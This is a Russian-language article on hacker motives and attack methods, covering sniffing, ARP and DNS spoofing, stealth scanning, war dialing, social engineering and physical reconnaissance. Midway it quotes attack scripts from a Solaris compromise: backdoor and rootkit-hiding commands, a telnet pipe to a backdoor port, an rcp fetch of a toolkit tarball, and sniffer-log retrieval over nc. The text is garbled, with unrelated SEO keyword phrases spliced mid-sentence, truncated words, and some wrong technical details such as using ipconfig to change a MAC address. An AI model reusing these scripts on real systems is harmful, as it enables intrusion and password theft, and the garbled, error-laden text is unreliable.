Сбор информации

Методы хакеров сканирования сайтов

исполняющихся на целевой системе



Хакер – это человек, умеющий профессионально обращаться с компьютерами. Мы очень часто называем Хакерами тех, кто ищет пути вторжения в компьютерную систему или выводит ее из строя.
Хакеры имеют четкое представление о работе компьютеров и сетей, о том, как протоколы используются для выполнения системных операций.


Определение мотивации хакеров


Мотивация – это ключ к пониманию поступков хакеров. Для чего они проникают в чужие системы, какой интерес она для них представляет, и вообще, почему компьютеры так привлекают их.

    • Привлечение внимания или самореализация

    • Алчность

    • Злой умысел



    Самой первой мотивацией, было, есть и будет – это самореализация или сам «взлом». Взломав систему, хакеры хвастаются своими победами, и тем самым зарабатывают «положение в обществе». методы защиты для мобильных устройств Выведя из строя компьютерную систему (или даже несколько), они специально удаляют уязвимое место, с помощью которого они вывели компьютер из строя, чтобы никто больше не смог повторить атаку. Данные атаки выполняются ради развлечения, спортивного интереса, и не связаны с определенной системой.

    Другими словами, любой компьютер, подключенный к интернету, представляет собой потенциальную мишень для атак.


    Это мотивов для преступной деятельности. Основные причины – жажда получения любой наживы (денег, товаров, услуг, информации). Хакеры, основным мотивом которых является алчность, ставят перед собой особые задачи – их главной целью становятся сайты с ценным содержанием (программным обеспечением, деньгами, информацией).


    Злой умысел или вандализм направлен на причинение вреда легальным пользователям, препятствуя их работе в системе, или законным владельцам сайта, изменяя их веб-страницы. В данном случае атака направлена на конкретные цели, главная задача которой нанести ущерб определенному сайту или организации.

    Причина – желание отомстить за несправедливое обращение или сделать политическое заявление. безопасность сайта Результат – причинение вреда системе без получения доступа к ней.


    Современные методы атак


    Скрипт киддиз (script kiddies) – это пользователи, отыскивающие сценарии эксплойтов в интернете и запускающие их против всех систем, которые только можно найти (не требуют специальных знаний или инструкций)


    Прослушивание коммутируемых сетей


    Прослушивание коммутируемых сетей или снифинг (sniffing) – используется хакерами для сбора паролей и другой системной информации после взлома системы.
    Принцип работы: сетевой адаптер перехватывает все пакеты, перемещающиеся по сети, а не только пакеты, адресованные данному адаптеру или системе после того, как снифер установит плату сетевого интерфейса в режим прослушивания смешанного трафика (promiscuous mode).

    Данные сниферы работают в сетях с разделяемой пропускной способностью с сетевыми концентраторами – хабами. В коммутируемой среде используются сниферы, специально разработанные для данной среды.


    Для кадра, передаваемого по сети Ethernet, на основании адреса доступа к среде передачи данных (Media Access Control) – MAC-адреса, коммутатор направляет трафик к портам. С учетом того, что каждая плата сетевого интерфейса имеет уникальный MAC-адрес, коммутатор распознает, какие адреса назначены какому порту. Поэтому при передаче кадра с определенным MAC-адресом получателя коммутатор направляет этот кадр к порту, к которому приписан данный MAC-адрес.


    Методы направлять сетевой трафик к сниферу:


    ARP – это протокол преобразования адресов (Address Resolution Protocol), используемый для получения MAC-адреса, связанного с определенным IP-адресом. При передаче трафика, сис-отправитель посылает ARP-запрос по IP-адресу получателя, а сис-получатель отвечает на этот запрос передачей своего MAC-адреса, который будет использоваться системой-отправителем для прямой передачи трафика. При перехвате интересующего трафика, снифер ответит на ARP-запрос вместо реальной системы-получателя и предоставит собственный MAC-адрес. В результате сис-отправитель будет посылать трафик на снифер. Если трафик на снифер будет переадресован не целиком, то появится вероятность возникновения отказа в доступе к сети. К тому же, снифер должен размещаться в том же самом сегменте локальной сети, где находятся системы отправителя и получателя.


    Дублирование MAC-адреса системы-получателя – еще один способ «убеждения» коммутатора посылать трафик на снифер. безопасность серверов баз данных Достигается это путем изменения MAC-адреса на снифере и размещения в системе, которая находится в том же сегменте локальной сети.
    Примечание: МАС-адрес в системе Unix меняется с помощью команды ipconfig , в системе Windows с помощью аналогичных утилит


    Имитация доменного имени


    Имитация доменного имени позволяет сниферу перехватывать DNS-запросы от системы-отправителя и отвечать на них. Снифер передает свой IP-адрес системе-отправителю, тем самым присваивая весь передающийся трафик себе. После чего он перенаправляет этот трафик реальному получателю. Для выполнения данной атаки сниферу необходимо просматривать все DNS-запросы и отвечать на них до того, как это сделает реальный получатель. Поэтому он должен располагаться на маршруте следования трафика от системы-отправителя к DNS-серверу, а еще лучше – в той же локальной подсети, что и отправитель.


    Отправка всего трафика ко всем портам


    Суть данной атаки заключается в следующем. Хакер непосредственно подключается к нужному коммутатору и заставляет его работать в качестве хаба (концентратора). Каждый коммутатор использует определенный объем памяти для хранения таблицы соответствий между MAC-адресом и физическим портом коммутатора.

    Эта память имеет ограниченный объем. При ее переполнении некоторые коммутаторы могут ошибочно выдавать состояние «открытый», это означает, что коммутатор прекратит передачу трафика по определенным MAC-адресам и начнет пересылать весь трафик ко всем портам. Другими словами коммутатор будет работать подобно сетевому устройству коллективного доступа (хабу), позволяя сниферу выполнять свои функции


    Выявление методов ненаправленных хакерских атак
    Хакеры, использующие методы ненаправленных атак движутся мотивом привлечь к себе внимание взломом, поэтому определенной цели для атаки у них нет.
    Обычно атака выполняется со взломаных систем и после проведения предварительного зондирования, чтобы хакер мог «замести следы»


    Предварительное исследование через интернет


    Выполняется с помощью скрытого сканирования диапазона адресов, называемое половинным IP-сканированием. аудит безопасность Выявляется с его помощью системы, находящиеся в данном диапазоне, и службы, доступные в этих сисх, а так же осуществляется отправка пинг-запросов в этом диапазоне адресов, т.е. отправка пинг-запроса по каждому адресу и просмотр полученных ответов.
    При скрытом сканировании обычно отправляется TCP SYN-пакет по IP-адресу и ожидается TCP SYN АСК-ответ.

    После получения ответа, хакер отправляет TCP RST-пакет для сброса соединения прежде, чем оно закроется, что позволяет скрыть попытки проникновения от службы регистрации событий целевой системы.


    Способы скрытого сканирования, позволяющие определить открытые порты, выполняются посредством передачи трафика к определенным портам. Если порт закрыт, он ответит RST-пакетом, если открыт – ответа получено не будет.


    Предварительное исследование можно провести в несколько этапов. С помощью зонной передачи регистрируются все системы и IP-адреса домена (произвольно выбранного), известные DNS. Получив список, в ход пускаются инструментальные средства типа Queso или Nmap для определения операционной системы потенциального объекта атаки. Скрытое сканирование выявит службы, выполняющиеся в системе, и эти данные используются для реальных атак.


    Предварительное исследование по телефону


    Заключается в выявления потенциальных жертв и определения систем, имеющих модем и отвечающих на входящие звонки. После выявления модемов с помощью программных средств, хакер обращается к каждому из них, определяя работающие программы. проверить безопасность сервера Далее с помощью программы PC Anywhere хакер захватывает управление ответившим компьютером.


    Предварительное исследование через беспроводные сети


    При использовании устройств типа GPS (Global Positioning System – глобальная сис навигации и определения положения) для записи координат точек беспроводные сети. Выявив сеть, хакер, с помощью компьютера и адаптера беспроводной сети, воспользуется выходом в интернет для атаки других сайтов.

    Беспроводная сеть организации – отличная маскировка для хакера.
    Хакеры, использующие методы ненаправленных атак, с помощью специальных средств сканирования находят несколько уязвимых систем, а затем создают сценарии атаки, направленной против всех систем одновременно. Менее опытные хакеры стараются взломать систему с помощью специальных эксплойтов в один прием.


    Использование взломанных систем


    После взлома системы хакер обычно помещает в нее «черный ход», использующийся вместе с инструментом rootkit, включающим версию системы с кодом «троянского коня» (позволяет скрыть присутствие хакера), через который он будет входить в систему в дальнейшем.

    Так же хакеры могут закрыть уязвимое место, через которое они проникли внутрь, чтобы никто больше не мог управлять «их системой». Хакеры копируют файлы с паролями других систем, чтобы поработать на досуге над их вскрытием, загружают программу-снифер для захвата паролей.

    После взлома сис используется для атаки или для предварительного зондирования.
    Рассматриваемая сис была взломана посредством переполнения буфера с помощью программы RPC Tooltalk для ОС Solaris. Был найден сценарий под названием bd , который загружался в систему.


    chown root /usr/sbin/inetd
    chgrp root /usr/sbin/inetd
    touch 0716000097 /usr/sbin/inetd
    ps -ef | grep ttdb | grep -v grep | awk ‘’ boo
    mv update ps /usr/man/tmp
    echo 1 \»./update -s -o output\» /kernel/pssys
    chmod 755 ps update
    touch 0716000097 /usr/bin/ps /usr/ucb/ps
    ps -ef | grep bob | grep -v grep
    ps -ef | grep stat | grep -v grep


    Другой интересный момент сценария – уничтожение хакером процессов, с помощью которых он проник в систему. безопасность web сервера Главной ошибкой сценария был запуск трех процессов inetd . Произошло следующее: множественные процессы inetd стали видны, и в папке /var/log/messages появились сообщения о том, что второй и третий процессы inetd не могут связаться с telnet и FTP-портами.


    После взлома системы с помощью эксплойта, хакер использовал сценарии для загрузки каждой системы со снифером и «черным ходом».


    В сценарии bd.sh содержатся всего две строки:


    ./bdpipe.sh | telnet $1 1524


    Третий сценарий называется bdpipe.sh 

    Он содержит набор команд, передаваемых через telnet и исполняющихся на целевой системе.
    echo «rcp Этот e-mail адрес защищен от спам-ботов, для его просмотра у Вас должен быть включен Javascript :neet.tar ./»
    echo «tar -xvf neet.tar»
    echo «rm -rf neet.tar bd update*»


    Предположительно, хакер планировал быстро взломать большое количество систем. Хотя сценарии несложные, много работы ушло на построение всех элементов атаки, чтобы добиться ширины ее размаха.


    Видно, что хакер не стал загружать снифер на все системы-жертвы. Присутствовали сценарии, предназначенные для извлечения собранных паролей. Первый сценарий назывался mget.sh .
    Третий сценарий назывался getshniff.sh . Он передавался через соединение nc и выполнялся на целевой системе.
    echo «cat output*»


    Все эти сценарии показывали, что после взлома системы хакер мог удаленно получать журналы снифера и, следовательно, проникать в системы, на которые не попал во время первой атаки. Автоматизация процесса взлома и извлечения паролей давала возможность быстрого доступа к большому количеству систем и расширения успеха с помощью получения и сохранения дополнительных паролей.
    Выявление методов направленных хакерских атак


    Целью использования метода направленных атак является проникновение в конкретную организацию или нанесение ей ущерба.


    Мотивация – стремление получить от организации информацию определенного типа. Хакер умышленно стремится причинить вред несколькими способами, используя для этого направленные DoS-атаки. К тому же уровень мастерства таких хакеров выше, чем у тех злоумышленников, которые не имеют определенных целей.


    Выбор объекта атаки в данном случае обоснован и преследует определенные цели: информация, представляющая интерес для хакера, наем хакера сторонней организацией для получения некоторых сведений и т.д. Но независимо от причин, выбирается именно объект, а не ее внутренняя систему


    Подготовка к атаке осуществляется в несколько шагов


    Предварительное исследование адресов, в ходе которой выявляется адресное пространство, используемое в организации (адрес главного DNS-сервера в домене и адрес почтового сервера, адреса всех веб-серверов, список диапазонов адресов, список всех используемых адресов и т. д.)


    Предварительное исследование телефонных номеров – дает хакеру возможность определить работающие модемы организации


    Предварительное исследование местности на предмет наличия беспроводных сетей


    Предварительное исследование системы


    Предварительное исследование системы дает возможность определить используемое оборудование, операционные системы и их уязвимые места, применяя развернутую отправку пинг-пакетов, скрытое сканирование или сканирование портов. Если он хочет остаться «в тени», то будет выполнять все очень медленно – один пинг-пакет по одному адресу примерно каждый час. Такая деятельность останется незамеченной для большинства администраторов.


    Для определения операционных систем желательно применить скрытое сканирование портов. Если сис отвечает через порт 139 (NetBIOS RPC), то это, вероятно, Windows (NT, 2000, XP, 95 или 98), если через порт 111 (Sun RPC/portmapper) – то это сис Unix, порт 25 – почтовые системы, 80 – веб-серверы.


    Выявлять уязвимые места можно осуществляя атаки или исследуя систему на наличие уязвимости.

    Как вариант – проверка номера версии популярного программного обеспечения, например, почтового сервера или DNS-сервера, которая и подскажет известные уязвимые места.


    При использовании сканера уязвимых мест, существует вероятность вызвать сигнал тревоги в системе обнаружения вторжений. Один сканер поможет хакеру отыскать единственную «прореху», другой выявит большее количество уязвимых мест. В любом случае хакер соберет нужную информацию, но, скорее всего, его присутствие будет замечено.


    Предварительное исследование сферы деятельности


    Эти исследования дают знания, как используются компьютерные системы, где размещена ценная информация и аппаратура, каким образом можно навредить системе.


    Физические методы сбора данных


    Позволяют узнать, какими устройствами контроля доступа, камерами наблюдения и службой охраны пользуется организация. Наблюдая за тем, как входят посетители, как выходят служащие во время перерыва, хакер выявляет слабые стороны системы физической безопасности, которые можно использовать для проникновения в здание. Хакер проследит и за тем, как обращаются с мусором и выброшенными документами.

    Если все это складывается в мусорный бак позади здания, то он может ночью порыться в нем и найти интересующую информацию.
    Хакер имеет на руках всю необходимую информацию об объекте атаки, он выбирает найболее подходящий способ с минимальным риском обнаружения.
    Если хакер надумает атаковать с помощью электронных методов, тогда он попытается скрыть атаку от IDS, разбивая ее на несколько пакетов.

    В случае успешного завершения атаки он сделает так, чтобы состояние системы выглядело как обычно. Чтобы состояние системы не привлекло внимание администратора, хакер уничтожит записи в журнале, выдающие его присутствие. А для последующих проникновений в систему он установит себе «черный ход».


    Если хакер решит атаковать с помощью дозвона по телефону, то его первоочередными целями станут системы с удаленным управлением или системы администратора, которые он будет атаковать в нерабочее время, чтобы предотвратить обнаружение атаки служащими.


    При нахождении уязвимой домашней системы служащего, он будет атаковать ее напрямую либо отправит туда вирус или «троянского коня», которая попадает на компьютер в виде вложения в сообщение электронной почты, и сможет самостоятельно исполнятся и инсталлироваться при открытии вложения.

    Такие программы особенно эффективны, если компьютер работает под управлением системы Windows.


    Выявление беспроводных сетей предоставляет хакеру способ легкого доступа. Нередко беспроводные сети являются частью внутренней сети организации и имеют меньше установленных и работающих устройств безопасности (типа систем IDS).


    При физическом методе атаки самым простым является исследование содержимого мусорного бака в ночное время. В нем можно найти всю необходимую информацию, а при отсутствии такой, могут пригодиться любые сведения для атак социального инжиниринга.


    Социальный инжиниринг – самый безопасный метод физической атаки, с помощью которого можно проникнуть в систему. Ключевой момент такой атаки – маленькая ложь. безопасность linux сервера К примеру, позвонив секретарю в приемной – узнать номер службы поддержки.

    После чего связаться с удаленным офисом и под видом секретаря разузнает о каком-нибудь служащем. Следующий звонок от его имени – в службу поддержки, чтоб попросить номер телефона для локального дозвона или забытый пароль. Добытая информация позволит хакеру войти в систему с легальным ID и паролем пользователя.


    Самым опасным типом физической атаки является реальное проникновение в организацию, на которое сможет решиться только серьезный хакер.

    Оказавшись внутри, его задачей будет подключение своего переносного компьютера к сети, чтобы получить в свое распоряжение всю сеть.


    Использование взломанной системы


    Стараясь скрыть следы своего присутствия настолько тщательно, насколько возможно, взломанная сис станет для него стартовой площадкой для проникновения в более засекреченные внутренние системы. Все действия будут выполняться максимально скрытно, чтобы не привлечь внимания администраторов.

    Похожие статьи Pentest